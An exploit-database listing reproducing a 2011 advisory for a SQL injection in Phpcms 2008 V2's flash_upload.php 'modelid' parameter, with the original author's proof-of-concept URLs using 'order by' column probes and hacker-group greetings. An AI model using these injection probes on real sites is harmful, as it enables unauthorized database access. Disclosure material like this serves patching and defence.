header-logo
Suggest Exploit
vendor:
Phpcms 2008 V2
by:
R3d-D3v!L
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Phpcms 2008 V2
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:phpcms:phpcms_2008_v2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2011

REMOTE SQL iNJECTioN Vulnerabilities

A Remote SQL Injection vulnerability exists in Phpcms 2008 V2, which allows an attacker to inject malicious SQL queries via the 'modelid' parameter in the 'flash_upload.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is confirmed in version 2.0. Successful exploitation of this vulnerability requires that magic_quotes_gpc is disabled.

Mitigation:

Ensure that magic_quotes_gpc is enabled.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

[~] Tybe: REMOTE SQL iNJECTioN 
[~] Vendor: www.phpcms.cn

[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L)) 
[~] 
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~] 
[?] contact: X[at]hotmail.co.jp 
[-] 
[?] Date: 17.jan.2011  
[?] T!ME: 05:15 am GMT  
[?] Home: WwW.XP10.COM 
[^]� Xp10_hAcKEr 
[?] 

====================================================================================== 
# REMOTE SQL iNJECTioN Vulnerabilities 
====================================================================================== 

[*] Err0r C0N50L3:


http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON




[*] prove of concept = 


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20--    (false)


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19--    (TruE)


Already Tested on Win Xp

[~]-----------------------------{((Xp10_hACkEr))}------------------------------------------------
# 
# 
[~] Greetz tO: [dolly &MERNA &po!S!ON Sc0rp!0N & ((hetlar jeddaH))  &(Nochelove) &emeliya & NEX ] 
# 
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # 
# 
[~] spechial thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers # 
# 
[?]spechial SupP0RT : MY M!ND # � 
# 
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) # 
# 
[~]spechial FR!ND: XP10.COM -_-_- lurklife.com # 
# 
[~] !'M 4R48!4N 3XPL0!73R. # 
# 
[~]{[(D!R 4ll 0R D!E)]}; # 
# 
[~]---------------------------------------------------------------------------------------------